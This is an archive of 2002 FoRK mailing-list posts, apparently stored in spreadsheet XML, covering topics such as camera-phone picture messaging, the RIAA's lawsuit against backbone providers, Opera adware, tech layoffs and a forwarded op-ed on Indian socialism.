&gt; -----Original Message-----
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
Gary
&gt; Lawrence Murphy
&gt; Sent: Sunday, August 18, 2002 9:26 PM
&gt; To: Robert Harley
&gt; Cc: fork@spamassassin.taint.org
&gt; Subject: Re: Al'Qaeda's fantasy ideology: Policy Review no. 114
&gt; 
&gt; &gt;&gt;&gt;&gt;&gt; "R" == Robert Harley  writes:
&gt; 
&gt;     R&gt; Well IIRC, Cortez arrived in 1519, and DeSoto was born circa
&gt;     R&gt; 1500.  You do the math.
&gt; 
&gt; Ah, I suppose so. If it wasn't DeSoto ... then who was it that landed
&gt; in Southern Florida to be greeted by great cities of millions of
&gt; mound-dwellers who had completely vanished by the time Cortez arrived
&gt; to kill as many as he could?
&gt; 
&gt; --
&gt; Gary Lawrence Murphy  TeleDynamics Communications
Inc
&gt;  Business Advantage through Community Software :
http://www.teledyn.com
&gt; "Computers are useless.  They can only give you answers."(Pablo
Picasso)
&gt; 
&gt; http://xent.com/mailman/listinfo/forkhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>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browser.http://www.pcsvision.com/pictures.htmlhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>&amp;&gt; Seems also from the news being reported that it's likely they already
&amp;&gt; have a slice of that pie, which says something about the mindset of
&amp;&gt; the people handing out the slices.When you can hold and sponsor a giant restrictive device (using giant
restrictorism principles, then,) conference/exhibition and get 30 invited
exhibitors, with lecturedemos, on elastic polity, concepts of public
responsibility have gone rather far off theory into quartering.The way I reckon it, they plan on fixing the seats/plane and security
problem by further sectioning airplanes:
	1- Checked luggage
	2- Calcium formerly in passengers and crew
	3- The rest of the passengers
	4- The cabin and crew, who get a calcium substitute more
	   readily controlled by a quorum of preservatory agencies.
	5 (optional:) - Premium services and DRM for checked laptops.
They reactivate calcium channels and put the calcium back when
you arrive.  If you don't like it, you have to claim it as they put the
calcium back, subject to retries, and you have to remember the flight
number you actually arrived on to do that....and you suddenly know all about vendors!http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>On 8/18/02 9:11 PM, "Robert Harley"  wrote:
&gt; 
&gt; Another theory is that Europe was a rural backyard until the Renaissance,
&gt; certainly when compared to big urban centres like Constantinople and Baghdad.
It is possible; hell if I know. 
&gt; I don't know the genetic studies of which you speak, but I know of one that
&gt; is sort-of relevant: apparently men of Ashkenazi descent are susceptible
&gt; to sickle-cell anemia and the probable reason is that the same genetic
&gt; factor that causes that also protects women from tuberculosis (IIRC), which
&gt; would have come in handy in central European towns at a time when the Jewish
&gt; population was a lot more urbanised than average Joes.
I actually hear about this from people who are researchers in
pharma-biotech.  My authority isn't much better than "they say", but they
say that they've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isn't because
nobody is looking elsewhere.You can find studies and results like this in the science wires.  For
example, one which I remember off the top of my head is the identified
genetic mutation that makes something like 1% of Caucasians immune to HIV-1,
and another 10-20% or so resistant to it.  Obviously, the protective
mutation occurred at some point in time prior to HIV-1 being introduced into
the European population.  What the researchers I've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bio-techs come up with
pharmacological solutions for people that don't have immunity.-James Rogers
 jamesr@best.comhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>I don't know for skimming that article which D&amp;D (dunderheads and disease?
Dowry and Dissent? Durer and Durant?) was given firmament, but the 
title's a bit redundant.  Can we drop the "Al-" somehow?JBIG is sweet.
My scanner driver is not.
Remind me how to ask for UHCI detail knowledgebases
I ent got.
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>On Sun, 18 Aug 2002, Rob Shavell wrote:&gt; down in the tech world than mobile visual communications.. and yet no one
&gt; seems to give much of a damn that right now that 2 persons can take photos
&gt; and share them instantly across space.  this is one of the biggest - andThe word "trivial" comes to mind.&gt; last - fundamental changes in human communications.  will be as big as the
&gt; browser.Remote realtime streaming video is neat, but sharing pictures? You invoke 
big words rather readily.http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>At 11:43 PM 8/18/02 -0700, Rob Shavell wrote:
&gt;sprint, if you haven't seen the marketing yet, is 1st to US market w/postwap
&gt;mobile data svc.Small nitpick:  Sprint PCS wasn't really first to market with their high 
speed data service.  Some would say they were actually last to market.  The 
only thing that was first about this is what they're calling "nationwide 
coverage", and you could even (and perhaps should) argue with that.&gt;   to me, there is nada more interesting and impactful going
&gt;down in the tech world than mobile visual communications.. and yet no one
&gt;seems to give much of a damn that right now that 2 persons can take photos
&gt;and share them instantly across space.  this is one of the biggest - and
&gt;last - fundamental changes in human communications.  will be as big as the
&gt;browser.Can you clarify why you think this is so?I'm in the midst of an ongoing argument with a guy who works for me about 
this very subject.  He, like you, thinks that things like MMS are going to 
change the world.  I am not convinced.What exactly about sending pictures to each other is going to have such a 
huge impact?  I'm waiting to be convinced.  I just don't see how it changes 
human communication in any really amazing way - and no one who believes it 
has yet done a good job explaining it to me.  I can understand SMS taking 
off, since communicating short text messages can be very useful in many 
situations.  However, I just don't see what's the compelling reason for 
sending pictures around to each other on a regular basis.  Are there 
instances when it makes sense?  Sure, I can think of plenty where it's a 
nice to have, but very few where it would be a "man, I need this" type of 
feature.I mean, right now, at my desk, it's easy for me to text message with lots 
of people, and I do all the time.  If I wanted to, I could also very easily 
snap a picture and send it to them, but I don't.  I did once, after I got a 
really bad haircut, and a friend wanted to see how it looked - but that's a 
fairly limited use.  Obviously, that's just one case, and maybe I'm just 
too old (argh!) to really "get" this new photo taking and sharing stuff, 
but I'm really trying to understand.So, I'm not saying it won't be a "fundamental change in human 
communications", but I'd just like to know why you think it will be?Mike
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>As yet another wave of people I know seem to have lost their jobs last week,
here is the latest in what I'm seeing...* Even knowing a CTO/CEO/CFO may not even get your resume looked at, the
feedback I'm getting is that hiring managers are only considering family
and extended family for jobs - everyone has plenty of unemployed relatives.* Most job sites are now almost empty - so the practice of posting "resume
bait" jobs is coming to an end. The postings they do have are months old
bait. This is now a completely pointless way to look for a job.* We're almost flatlne in jobs created for several months, where population
growth needs about 120k jobs a month to keep things steady.* Unemployment rates are only staying steady becasue people drop out of the
workforce number after they cant find a job for a long time. The "not in
labor force" is rising 400k a month. International numbers are no better -
technology is replacing people, especially the people tha tmake the
technoogy.* Grad school programs are stuffed full of people for every non-tech major.
Colleges are having big headaches dealing with all the day-job refugees.* Spam for porn, ink, and stocks has dropped off, spam (the english ones I
see subject lines for) now seems to be dominated by work-at-home scams and
resume services. That's got to be a BAD sign.* FoRK is now almost all spam, somebody fix the damn subscriber-only-posting
setting already, dont make me show up at your house Rohit ;)- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.comhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>&gt; * FoRK is now almost all spam, somebody fix the damn subscriber-only-posting
&gt; setting already, dont make me show up at your house Rohit ;)Upon a similar (albeit slightly friendlier :-) threat to Rohit et. al.,
I have received a promise that things will be fixed Real Soon Now.
Which is good because I don't want to have to piss off Kragen :-)- Joehttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t xml:space="preserve">
--- begin forwarded text
To: rah@ibuc.com
From: "Network Associates" 
Date: Mon, 19 Aug 2002 05:34:11 -0700
Reply-To: "Network Associates" 
Subject: PGP Corp. Purchases PGP Desktop Encryption and Wireless Product
Lines from NETAugust 19, 2002
Dear Customer,Today we are pleased to announce that PGP Corporation, a newly formed,
venture-funded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technology.Network Associates has retained products developed using PGPsdk including
McAfee E-Business Server for encrypted server-to-server file transfer,
McAfee Desktop Firewall and McAfee VPN Client. These products will remain a
part of Network AssociatesÂ’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Macintosh.In addition to the technology, PGP Corporation has acquired all worldwide
customer license agreements and technical support obligations. To ensure a
seamless transition, Network Associates will work with PGP Corporation to
support PGP customers through October 26, 2002. PGP Corporation will
contact you shortly with details on its plans and product direction.We trust that you will have continued success with the PGP desktop and
wireless encryption products through PGP Corporation. Network Associates
appreciates your business and we value our continued relationship across
our remaining product lines.
Best Regards,Sandra England
Executive Vice President, Business Development and Strategic Research
Network Associates****************************************************************************************************
You have received this message because you are a subscriber to the Network
Associates Web sites. To unsubscribe, please follow the instructions at the
end of this message.This information update is available at no charge to all registered users
of Network Associates Web site.* To change your email address, send a reply to this email address and to
subscribe@nai.com with the words, "change-address" in the subject line. In
the body of the message include your old and new email addresses with the
original message. Use the following format for email changes:
OLD: enduser@olddomain.com
NEW: Joseph_User@newdomain.com
______________________________________________________________________
This message was sent by Network Associates, Inc. using Responsys Interact
(TM).If you prefer not to receive future e-mail from Network Associates, Inc.:
    http://nai.rsc01.net/servlet/optout?gHpgJDWWBEkHoFpINJDJhtE0To view our permission marketing policy:
    http://www.rsvp0.net---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</si>
  <si>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 xml:space="preserve">
fwd-----
It would appear that Yahoo! has joined the ranks of western companies
dedicated to helping restrict the freedoms of people in other countries
for the sake of improving their profit margins. Yahoo! has signed the
"Public Pledge on Self-discipline for China Internet Industry" (more
here http://www.dfn.org/voices/china/selfdiscipline.htm ), essentially a
promise to help police Chinese internet users for the
State:&gt;&gt;&gt;From this article in The Nando Times:
http://www.nandotimes.com/technology/story/494845p-3946998c.htmlThe Chinese version of the popular Yahoo! Internet portal risks becoming
an online policeman for China's communist government if it keeps a promise
to voluntarily investigate potentially subversive content, a human rights
group has warned."If it implements the pledge, Yahoo! will become an agent of Chinese law
enforcement," Kenneth Roth, Human Rights Watch's executive director, said
Friday. "It will switch from being an information gateway to an
information gatekeeper."More from Human Rights Watch.
http://hrw.org/press/2002/08/yahoo080902.htm----------------------------http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>...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is...Best,
   RohitPS. feel free to drop by SF tonight for his reading/signing!===============================================================
Monday, August 19 at 7 pm
Alexander Blakely
Siberia Bound is a coming-of-age account of life as an entrepreneur in a 
new wild-and-free-marketâ€¹ Russia of the early 1990s. Alexander Blakely 
uses his gift for storytelling to describe the four years he spent 
living and working toward the American dream in the former Soviet Union.A Clean Well-Lighted Place for Books
at Opera Plaza
601 Van Ness Avenue
San Francisco, CA 94102
OUR DIGITSPhone: (415) 441-6670
Fax: (415) 567-6885
Email: books@bookstore.com
=====================================================
http://www.washingtonpost.com/wp-dyn/articles/A24428-2002Aug15.html'Siberia Bound: Chasing the American Dream on Russia's Wild Frontier' by 
Alexander BlakelyReviewed by David Tuller
Sunday, August 18, 2002; Page BW08
SIBERIA BOUND
Chasing the American Dream On Russia's Wild Frontier
By Alexander Blakely
Sourcebooks. 320 pp. $22.95Judging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a lifetime of rabid ambivalence to chew on until I've got 
no teeth left."Blakely manages to include a few unpleasant -- and wholly unnecessary -- 
laughs at the expense of Chinese workers and gays. And although I like 
wordplay as much as the next guy, it's jarring when non-English-speaking 
characters make puns in English. "In a pinch," says one character, a 
chocolate factory director who warns Blakely not to store extra cocoa 
beans on site, "I'm afraid we would probably take a pinch."Some of these faults wouldn't matter if Siberia Bound were a picaresque 
novel or an account that didn't aspire to authenticity. But the effect 
here is to undermine a reader's faith in the narrator's reliability and 
to reduce most of the characters to the stock figures encountered in 
dozens of other accounts of Russian life. So in the end, I believed the 
broad contours of Blakely's story but found it hard to take seriously 
many of the particulars. And his ultimate conclusion -- that capitalism, 
material comfort and wealth do not bring happiness -- hardly qualifies 
as a revelation. â€¢David Tuller is a contributing writer at Salon.com and the author of 
"Cracks in the Iron Closet: Travels in Gay and Lesbian Russia."
Â© 2002 The Washington Post Companyhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Sorry, gang, but I've flipped the switch. If your posting address 
doesn't match your subscription address, or if you've instructed a robot 
to forkpost on your behalf, it'll get held, silently, for me or Kragen 
to review. Which will be rarely, so be warned.Let's see how this works out for a week or so...Rohit---
My permanent email address is khare@alumni.caltech.eduhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>I can't see it either.I do however disagree with Joe in that it needs to be 2+MPixels to 
be useful.  Value is not always necessarily defined by quality 
(just look at 802.11).If I had a self-contained communications unit that let me share 
things: documents, the weather, my new hairdo, by newborn baby, 
etc. and it fit in my pocket then it might encourage me to share 
those things more often.  If we're talking on the phone and you ask 
me what the weather is like and I say "hang on", outstretch the 
device with my arm extended, press a button, and instantly send you 
a picture on me with blue sky in the background, that has value.But if I say "hang on", fumble around in my briefcase for a digital 
camera, and  after 5 minutes of plugging and praying with USB 
finally am able to take a photo of me, bound by several feet of 
cable and multiple devices, well, that doesn't really have value.If I'm a Paparazzi I'd love to be able to send high-res photos 
using my mobile phone because that has real economic impact, and I 
could put up with the hassle for the amount of time it saves me.  
However, I don't think that is the market that Sprint PCS is 
contemplating.The fact that Sprint has not made the assumption that both the 
sender and recipient of the picture are using their mobile phones 
will help this survive. Gets around the whole "fax" problem (where 
both sender and receiver have to have faxes in order for that 
technology to be useful).On the whole, not very useful for regular Joes (pun intended).  Put 
the camera in the phone (even a low-res one) and then it'd at least 
be cool.-Ian.On Monday, August 19, 2002, at 05:04 AM, Joseph S. Barrera III wrote:&gt; Rob Shavell wrote:
&gt;&gt; sprint, if you haven't seen the marketing yet, is 1st to US 
&gt;&gt; market w/postwap
&gt;&gt; mobile data svc.  to me, there is nada more interesting and 
&gt;&gt; impactful going
&gt;&gt; down in the tech world than mobile visual communications.. and 
&gt;&gt; yet no one
&gt;&gt; seems to give much of a damn that right now that 2 persons can 
&gt;&gt; take photos
&gt;&gt; and share them instantly across space.
&gt;
&gt; You're right. Or at least, I don't. I saw an advert for it on TV 
&gt; last night (can't miss Futurama :-) and I thought, "boy, that's 
&gt; dumb."
&gt; If I wanted to share pictures with someone, I'd email them to them,
&gt; where they could see them on a 1024x or 1600x display, instead of
&gt; looking at a postage stamp on their cell phone. Or, I'd bring a 
&gt; printout
&gt; if they needed to see it. Etc. We all have 2+Mpixel cameras now 
&gt; anyways,
&gt; right? (This is one reason why I never bought the camera attachment
&gt; for my handspring visor -- resolution was too poor.)
&gt;
&gt; In fact, with a 1GB microdrive in my camera, I often just keep
&gt; old pictures around, and I can show people pictures using the
&gt; camera's display. Which is bound to be better than the cell phone's.
&gt;
&gt; - Joe
&gt; -- The Combatant State is your father and your mother, your only
&gt; protector, the totality of your interests. No discipline can
&gt; be stern enough for the man who denies that by word or deed.
&gt;
&gt;
&gt; http://xent.com/mailman/listinfo/forkhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>On Mon, 19 Aug 2002, Rohit Khare wrote:&gt;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so...And I didnt even need to visit, woohoo :)... Proving that the threat of my presence gets action in only 14 hours. I
think I should be offended, but I'll be too busy basking in the glow of a
spam-free FoRK :)- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.com
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>The RIAA continues to amaze me.    Everyone might want to grok the
news yahoo has:http://rd.yahoo.com/dailynews/nm/tc_nm/inlinks/*http://Listen4ever.com
And if you're really bored, go ahead and read the papers that were
filed by the RIAA against the major backbone providers.http://www.riaa.com/pdf/Listen4Ever.pdf
So it looks like the RIAA is getting bored with its usual tack of
suing the peer-to-peer services, and is instead using the DMCA
to sue ISPs and backbones into compliance --  They want said backbones
to block the ip address of the listen4ever.com server due to
listen4ever's alleged infringement of copyright.  To quote
the Motion that the RIAA issued:  "Plaintiffs request that
the Court issue a preliminary injunction requiring Defendants to block
communication to and from Listen4ever's servers that travel through
Defendants' backbone routing systems".At least according to the RIAA (probably for bonus terror tactics )
the Listen4ever site is even more formidable than that bane of p2p
goodness, Napster, due to the fact that its on a centralized server,
out of their reach of RIAA/DMCA control (its located in China), and
because according to the RIAA it facilitates the downloading of entire albums.
Apparently listen4ever has a few other sites floating around, and the RIAA has been
unsuccessful in getting any of them to voluntarily surrender
service(1).Gotta love the RIAA for jumping into this lawsuit with the customer's
interests in mind.  How lawyers can write drivel along the lines of
'if you dont stop these guys, we'll run out of money and we won't be
able to supply you new music!' just blows my mind, especially in this
day and age.   The RIAA has enough money to file inane lawsuits
against backbone providers, but they don't have enough money to
produce new artists?  Something seems wrong here.Here's my problem.  Say the RIAA wins in court, and the backbone
providers comply.   Their biggest hurdle is now accomplished, and one
hell of a terrible precident is/can be set.   At least in the RIAA's
case, I'm sure once they get a Court-mandated Ok for this particular
site, they'll just go ahead, write their nice friendly lawyer letters,
and demand that subsequent IP addresses also be blocked, as they too
route to sites that are problematic to the RIAA.Even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non-reported event occuring from then
 on, the systematic C&amp;Ding of the Internet.   Anything that violates the
DMCA, given its takedown provisions, might now potentially
fall prey to a Cease &amp; Desist letter.  Rather than appealing, the
backbone providers will just agree -- as they seem likely to do
'provided a court order'.Point being is that soon this won't take a court order.  A nastygram
will suffice and we'll wonder where all the new
music/information/dissenting opinions/ criticisms went.This is a scary road we're running down here.   So nice to see that
its still hush-hush in the geek community.Whats more bizzare is some of the support(?) that the RIAA seemed to
get.   I'm curious for instance, how Dave Farber got dragged into
this...  (2) Dave, you still read FoRK?(1) Save for one, lmp3.com, which was listed as a redirect site in the
court documents, has since gone down.   Their website has a humorous little note:  "Lmp3
will be closed and will never come back! ".  Listen4ever.com is not
responding, but i'm not quite sure if thats due to backbone compliance
or the site being overburdened.(2) Declaration of Prof. David J. Farber:
http://www.riaa.com/pdf/Listen4Ever.pdf (p. 95)
A very disgruntled,bitbitch
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>&gt; John Hall signs his message:
&gt; &gt; John Hall
&gt; &gt; 13464 95th Ave NE
&gt; &gt; Kirkland WA 98034
&gt;
&gt; Is this some new "I'm not spam" signal, to include a
&gt; valid mailing address?
&gt;
&gt; - GordonDear Gawd - /I/ live in Kirkland. I hope I don't wake up one day and realize
/I/ am John Hall...I wonder if I can get GPS lat/long from street address... start a new
GeoTrashing sport or something...Hmm... that address is only a quarter-mile from my old house... and about a
block from a friend of mine. Weird...http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Am I going to long for the good old days of Nigerian 419?After picking up the land-line phone mid-day (always a bad idea) only to 
slam it down before the telemarketer even spoke, I have in mind an 
invention.  If my brain can detect the crosstalk from a call-center before 
the human, sub-human, or machine starts speaking, why not have a box that 
just hangs up for me?  Maybe it could blow a police whistle (play a 
sample) into the phone first.Currently, a strategy of leaving the machine on as a screener works pretty 
well, but I still get Carey-on-RIAA style mad when the damn phone rings 
and it's NOT anyone I want to talk to......I want to like Spider Robinson's works.  Really.  I mean having a "Bridge 
of Birds" attraction in the "China that never was" portion of the theme 
part in "The Free Lunch...."   But, I really fell for his anti-paparatzi 
device (invented by a princess Diana fan).   Doggone.  I've now completely 
reasoned my way around it.  It has a built-in defense against the first 
obvious way of confounding it, but that leads directly to an exploit that 
uses off the shelf hardware that a paparatzi ought to have in her kit.
That's so often the problem with Robinson.  He doesn't think that you the 
reader are nearly so smart as he.  Heh.   I admit that reading a lot of 
slushpile manuscripts does not improve one's opinion of fellow-man, but
I always resent him for not being thorough.Eirikurhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>On Mon, 19 Aug 2002, Joseph S. Barrera III wrote:&gt; In fact, with a 1GB microdrive in my camera, I often just keep
&gt; old pictures around, and I can show people pictures using the
&gt; camera's display. Which is bound to be better than the cell phone's.A detachable clip-on eyepiece display could be arbitrarily high-res. Now
that we see first OLED prototypes (cheap, can be printed on curved
surfaces resulting in cheaper optics) it can't be more than 5 years off.
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>We were sitting here talking about Opera, and the fact that it's not free 
anymore (unless you want the scrollypollies),  and how that sucked and 
stuff, and someone said something about  nagware, and I misinterpretted it 
as snag ware, which mainly means, oh  yeh, right, I'm gonna buy this 
-eyeroll- where's someone with a key?  LOL  So who is it again who's on 
this list who's associated with Opera?  Why's the free one using the same 
LAME idea netzero, etc useD?   I know what kind of  costs are involved in 
creating software like this, and I understand everyone needs to eat, but 
if someone can get netscape for free, and opera isn't free, then, hmmm...  
I imagine this email is going to bring some bricks down on my head, but 
well, go for it, I gots my helmet.  (:
Cindy
P.S. GregB, you there?  (:-- 
"I don't take no stocks in mathematics, anyway" --Huckleberry Finnhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Joseph S. Barrera III:
&gt;I just use the free/adware version of Opera. I mean,
&gt;half the pages I look at have ads on them anways ..I didn't mind the ads. The problem is that the ad
server Opera puts on your machine is a PIG. Every
time it goes to change the ad, it thrashes my
laptop for thirty seconds. So no, I don't mind
the ad, but I do mind that serving ads cripples
the browser.Alas, Mozilla is also a PIG. So I'm back to using
IE, which seems to be the only free, reasonably
featured browser that runs decently on my laptop.
I'm open to alternatives .._________________________________________________________________
MSN Photos is the easiest way to share and print your photos: 
http://photos.msn.com/support/worldwide.aspxhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>RAH quoted:
&gt;Indians are not poor because there are too many of them; they are poor
&gt;because there are too many regulations and too much government intervention
&gt;-- even today, a decade after reforms were begun. India's greatest problems
&gt;arise from a political culture guided by socialist instincts on the one
&gt;hand and an imbedded legal obligation on the other hand.Nice theory and all, but s/India/France/g and the statements hold just
as true, yet France is #12 in the UN's HDI ranking, not #124.
&gt;Since all parties must stand for socialism, no party espouses
&gt;classical liberalismI'm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R
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>I develop software and my pricing is that I charge the first set of
customers that drive the features included quite a bit, then charge the
majority of the customers a small fee, and when I've earned back what I
invested (including my hourly wage) then I release that software for free
and either start working on a newer version (again back to the adding
features step) or on a new product. If you can't find someone willing to
pay your costs of development then most likely there really isn't a need
for the product you're trying to sell and you shouldn't develop it. If you
have to resort to free versions with lame ass ads and stuff then that is a
strong indication to get a new project IMO.  :)
&gt; We were sitting here talking about Opera, and the fact that it's not
&gt; free anymore (unless you want the scrollypollies), and how that sucked
&gt; and stuff, and someone said something about nagware, and I
&gt; misinterpretted it as snag ware, which mainly means, oh yeh, right, I'm
&gt; gonna buy this -eyeroll- where's someone with a key?  LOL So who is it
&gt; again who's on this list who's associated with Opera?  Why's the free
&gt; one using the same LAME idea netzero, etc useD?  I know what kind of
&gt; costs are involved in creating software like this, and I understand
&gt; everyone needs to eat, but if someone can get netscape for free, and
&gt; opera isn't free, then, hmmm...  I imagine this email is going to bring
&gt; some bricks down on my head, but well, go for it, I gots my helmet.  (:
&gt; Cindy P.S. GregB, you there?  (:http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>bitbitch@magnesium.net wrote:&gt;The RIAA continues to amaze me.    Everyone might want to grok the
&gt;news yahoo has:
&gt;
&gt;http://rd.yahoo.com/dailynews/nm/tc_nm/inlinks/*http://Listen4ever.com
&gt;
&gt;
&gt;And if you're really bored, go ahead and read the papers that were
&gt;filed by the RIAA against the major backbone providers.
&gt;
&gt;http://www.riaa.com/pdf/Listen4Ever.pdf
&gt;
&gt;
&gt;
&gt;
&gt;A very disgruntled,
&gt;
&gt;bitbitch
&gt;
&gt;
&gt;http://xent.com/mailman/listinfo/fork
&gt;
Well perhaps this little tidbit of sanity will make you (slightly) more 
gruntled:
http://www.informationwave.net/news/20020819riaa.php
----------------------------------------------------------
*IWT Bans RIAA From Accessing Its Network**August 19, 2002*Information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site.The placement of this policy is not intended to hamper the RIAA's piracy 
elimination agenda or advocate Internet piracy, but to ensure the safety 
of our customers' data attached to our network from hackers or corporate 
espionage hidden by the veil of RIAA copyright enforcement.If you have questions, comments, or concerns regarding this policy, 
please e-mail riaa@informationwave.net .
----------------------------------------------------------------------------------
Owen
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>All good arguments, except till you realize that
majority of indians were poor even before
independence. Sateesh
--- "R. A. Hettinga"  wrote:
&gt;
http://online.wsj.com/article_print/0,,SB1029790639190441115,00.html
&gt; 
&gt; 
&gt; The Wall Street Journal
&gt; 
&gt; August 20, 2002
&gt; COMMENTARY
&gt; 
&gt; The Curse of India's Socialism
&gt; 
&gt; By CHRISTOPHER LINGLE
&gt; 
&gt; In a classic case of deflecting blame for their own
&gt; shortcomings,
&gt; politicians in India have identified the size of the
&gt; population as the
&gt; country's biggest problem. This position was stated
&gt; in a unanimous
&gt; parliamentary resolution passed on the 50th
&gt; anniversary of independence.
&gt; Half a decade later, it is a belief that still
&gt; resonates with many. Yet it
&gt; is hard to imagine a more cynical view. If left free
&gt; from the extensive
&gt; interference of various levels of government, the
&gt; energy and creativity of
&gt; the Indian people could soon allow them to be among
&gt; the richest on earth.
&gt; 
&gt; Indians are not poor because there are too many of
&gt; them; they are poor
&gt; because there are too many regulations and too much
&gt; government intervention
&gt; -- even today, a decade after reforms were begun.
&gt; India's greatest problems
&gt; arise from a political culture guided by socialist
&gt; instincts on the one
&gt; hand and an imbedded legal obligation on the other
&gt; hand.
&gt; 
&gt; While India's political culture reflects the beliefs
&gt; of its founding
&gt; fathers, there is the additional matter of the
&gt; modified preamble to its
&gt; constitution that specifies: "India is a sovereign,
&gt; secular, socialist
&gt; republic." It was Indira Gandhi who had the words
&gt; "socialist" and "secular"
&gt; added in the late 1970s. At the same time, she also
&gt; amended the relevant
&gt; section in the Representation of Peoples Act to
&gt; require that all recognized
&gt; and registered parties swear by this preamble. Since
&gt; all parties must stand
&gt; for socialism, no party espouses classical
&gt; liberalism (yet there are
&gt; numerous communist parties).
&gt; 
&gt; While one can appreciate the difficulty of
&gt; abandoning ideas with such
&gt; honored lineage, the fact that socialism has been
&gt; widely discredited and
&gt; abandoned in most places should prompt Indians to
&gt; reconsider this
&gt; commitment. Despite evidence of its failure as an
&gt; economic system, many of
&gt; the socialists who carry on do so by trying to
&gt; proclaim that their dogma
&gt; reinforces certain civic virtues. A presumed merit
&gt; of socialism is that it
&gt; aims to nurture a greater sense of collective
&gt; identity by suppressing the
&gt; narrow self-interest of individuals. However, this
&gt; aspect of socialism lies
&gt; at the heart of its failure both as a political tool
&gt; as well as the basis
&gt; for economic policy.
&gt; 
&gt; Let's start with the economic failures of socialism.
&gt; Most of the grand
&gt; experiments have been ignominiously abandoned or
&gt; recast in tortured terms
&gt; such as the "Third Way" that defer to the importance
&gt; of markets and
&gt; individual incentives. Unfortunately, it took a
&gt; great deal of human
&gt; suffering before socialists abandoned their goal of
&gt; trying to create an
&gt; economic system on the basis of collective goals.
&gt; 
&gt; Socialist ideologues are impervious to evidence that
&gt; their system inspires
&gt; even more human misery in the civic realm. This is
&gt; because socialism
&gt; provides the political mechanism for and legitimacy
&gt; by which people
&gt; identify as members of groups. While it may suit the
&gt; socialist agenda to
&gt; create them-and-us scenarios relating to workers and
&gt; capitalists or
&gt; peasants and urban dwellers, this logic is readily
&gt; converted to other types
&gt; of divisions.
&gt; 
&gt; In the case of India, competition for power has
&gt; increasingly become
&gt; identified with religiosity or ethnicity, as is
&gt; evident by the rise of the
&gt; Bharatiya Janata Party, supported by radical
&gt; Hindutva supporters. As
&gt; elsewhere, political parties based on religion are
&gt; by their very nature
&gt; exclusionary. These narrow concepts of identity work
&gt; against nation
&gt; building since such a politics forces arrangements
&gt; that cannot accommodate
&gt; notions of universal values.
&gt; 
&gt; Socialism also sets the stage for populist promises
&gt; of taking from one
&gt; group to support another. This variety of political
&gt; posturing by the
&gt; Congress Party was used to build a coalition of
&gt; disaffected minorities. In
&gt; turn, the BJP built its power base on a promise to
&gt; restore power to Hindus.
&gt; And so it is that India's heritage of socialist
&gt; ideology provided the
&gt; beginnings of a political culture that evolved into
&gt; sectarian populism that
&gt; has wrought cycles of communal violence. Populism
&gt; with its solicitations of
&gt; political patronage, whether based upon nationalism
&gt; or some other ploy, is
&gt; also open to the sort of rampant corruption so
&gt; evident in India.
&gt; 
&gt; At issue in India is nothing less than the role of
&gt; the state. Should it be
&gt; used as a mechanism to protect the freedom and
&gt; rights of individuals? Or
&gt; should the state be a vehicle for groups to gain
&gt; power? It should be clear
&gt; the latter approach would lead to the destruction of
&gt; India's democracy
&gt; while the former will allow it to survive.
&gt; 
&gt; It is undeniable that India's public policy guided
&gt; by socialism has
&gt; promoted divisions that contributed to social
&gt; instability and economic
&gt; destruction. This dangerous game has only served the
&gt; narrow interests of
&gt; those who seek to capture or preserve power. That
&gt; India is a "socialist"
&gt; state, specified in a preamble to the constitution,
&gt; makes this binding
&gt; commitment evident in the nature of interventionist
&gt; policies that have
&gt; wrought slower economic growth causing great harm to
&gt; the poor and unskilled
&gt; who have lost access to economic opportunities.
&gt; Socialism also introduced
&gt; forces that are destroying India's hard-earned
&gt; democracy. A paradigm shift
&gt; in the nature of Indian politics is needed so the
&gt; state ceases serving as a
&gt; mechanism for groups to gain power and instead
&gt; becomes an instrument to
&gt; secure rights and freedoms for individuals.
&gt; 
&gt; Mr. Lingle is professor of economics at Universidad
&gt; Francisco Marroquin in
&gt; Guatemala, and global strategist for
&gt; eConoLytics.com.
&gt; 
&gt; 
&gt; 
&gt; -- 
&gt; -----------------
&gt; R. A. Hettinga 
&gt; The Internet Bearer Underwriting Corporation
&gt; 
&gt; 44 Farquhar Street, Boston, MA 02131 USA
&gt; "... however it may deserve respect for its
&gt; usefulness and antiquity,
&gt; [predicting the end of the world] has not been found
&gt; agreeable to
&gt; experience." -- Edward Gibbon, 'Decline and Fall of
&gt; the Roman Empire'
&gt; http://xent.com/mailman/listinfo/fork
__________________________________________________
Do You Yahoo!?
HotJobs - Search Thousands of New Jobs
http://www.hotjobs.com
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>http://www.informationwave.net/news/20020819riaa.php
  IWT Bans RIAA From Accessing Its NetworkAugust 19, 2002Information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site.The placement of this policy is not intended to hamper the RIAA's piracy
elimination agenda or advocate Internet piracy, but to ensure the safety of
our customers' data attached to our network from hackers or corporate
